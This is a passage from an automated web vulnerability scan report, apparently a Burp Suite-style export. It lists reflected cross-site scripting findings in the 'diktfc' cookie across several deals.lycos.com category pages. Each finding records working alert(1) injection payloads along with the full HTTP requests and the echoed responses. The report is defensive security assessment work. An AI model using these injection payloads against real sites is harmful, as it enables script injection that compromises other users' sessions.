P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:52 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47586

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/pc-computers-47&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A97fa0"><script>alert(1)</script>22b63eeca5d&amp;cj=1" alt="tracker" />
...[SNIP]...

1.294. http://deals.lycos.com/deals/category/pc-computers-47 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pc-computers-47

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3e84"%3balert(1)//725b98a132d was submitted in the diktfc cookie. This input was echoed as b3e84";alert(1)//725b98a132d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/pc-computers-47 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3e84"%3balert(1)//725b98a132d; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:29:53 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:29:54 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47539

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/pc-computers-47",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab3e84";alert(1)//725b98a132d"
});
</script>
...[SNIP]...

1.295. http://deals.lycos.com/deals/category/pets-221 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pets-221

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92d65"%3balert(1)//18a8cd271fa was submitted in the diktfc cookie. This input was echoed as 92d65";alert(1)//18a8cd271fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/pets-221 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A92d65"%3balert(1)//18a8cd271fa; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:32 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:32 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28411

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/pets-221",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A92d65";alert(1)//18a8cd271fa"
});
</script>
...[SNIP]...

1.296. http://deals.lycos.com/deals/category/pets-221 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/pets-221

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89742"><script>alert(1)</script>b872a3a4dcc was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/pets-221 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A89742"><script>alert(1)</script>b872a3a4dcc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:30 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 28361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/pets-221&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A89742"><script>alert(1)</script>b872a3a4dcc&amp;cj=1" alt="tracker" />
...[SNIP]...

1.297. http://deals.lycos.com/deals/category/sports-and-fitness-211 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/sports-and-fitness-211

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3b12d"%3balert(1)//42efa8c45f1 was submitted in the diktfc cookie. This input was echoed as 3b12d";alert(1)//42efa8c45f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/sports-and-fitness-211 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b12d"%3balert(1)//42efa8c45f1; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:42 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:42 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46480

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/sports-and-fitness-211",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3b12d";alert(1)//42efa8c45f1"
});
</script>
...[SNIP]...

1.298. http://deals.lycos.com/deals/category/sports-and-fitness-211 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/sports-and-fitness-211

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72d28"><script>alert(1)</script>cbdacb961cb was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/sports-and-fitness-211 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A72d28"><script>alert(1)</script>cbdacb961cb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:40 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:40 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 46511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/sports-and-fitness-211&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A72d28"><script>alert(1)</script>cbdacb961cb&amp;cj=1" alt="tracker" />
...[SNIP]...

1.299. http://deals.lycos.com/deals/category/televisions-159 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/televisions-159

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd261"><script>alert(1)</script>061e5deae73 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/televisions-159 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd261"><script>alert(1)</script>061e5deae73; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:51 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 47998

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/televisions-159&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Afd261"><script>alert(1)</script>061e5deae73&amp;cj=1" alt="tracker" />
...[SNIP]...

1.300. http://deals.lycos.com/deals/category/televisions-159 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/televisions-159

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1fcd"%3balert(1)//17153ed5472 was submitted in the diktfc cookie. This input was echoed as d1fcd";alert(1)//17153ed5472 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/televisions-159 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad1fcd"%3balert(1)//17153ed5472; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:52 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
pt type="text/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/televisions-159",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ad1fcd";alert(1)//17153ed5472"
});
</script>
...[SNIP]...

1.301. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/travel-and-entertainment-206

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68ab0"%3balert(1)//e4a4a2514b6 was submitted in the diktfc cookie. This input was echoed as 68ab0";alert(1)//e4a4a2514b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/category/travel-and-entertainment-206 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A68ab0"%3balert(1)//e4a4a2514b6; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:45 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deals/category/travel-and-entertainment-206",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A68ab0";alert(1)//e4a4a2514b6"
});
</script>
...[SNIP]...

1.302. http://deals.lycos.com/deals/category/travel-and-entertainment-206 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/category/travel-and-entertainment-206

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98c1d"><script>alert(1)</script>7cb04211ed3 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/category/travel-and-entertainment-206 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A98c1d"><script>alert(1)</script>7cb04211ed3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:30:43 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:30:43 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 45931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/category/travel-and-entertainment-206&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A98c1d"><script>alert(1)</script>7cb04211ed3&amp;cj=1" alt="tracker" />
...[SNIP]...

1.303. http://deals.lycos.com/deals/stores [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5bc0"><script>alert(1)</script>c7e153dfa56 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deals/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac5bc0"><script>alert(1)</script>c7e153dfa56; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:14 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:14 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31882

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<img src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deals/stores&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac5bc0"><script>alert(1)</script>c7e153dfa56&amp;cj=1" alt="tracker" />
...[SNIP]...

1.304. http://deals.lycos.com/deals/stores [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deals/stores

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b302d"%3balert(1)//2f566655819 was submitted in the diktfc cookie. This input was echoed as b302d";alert(1)//2f566655819 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deals/stores HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ab302d"%3balert(1)//2f566655819; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:31:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:15 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 31852

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
<script type="text/javascript">
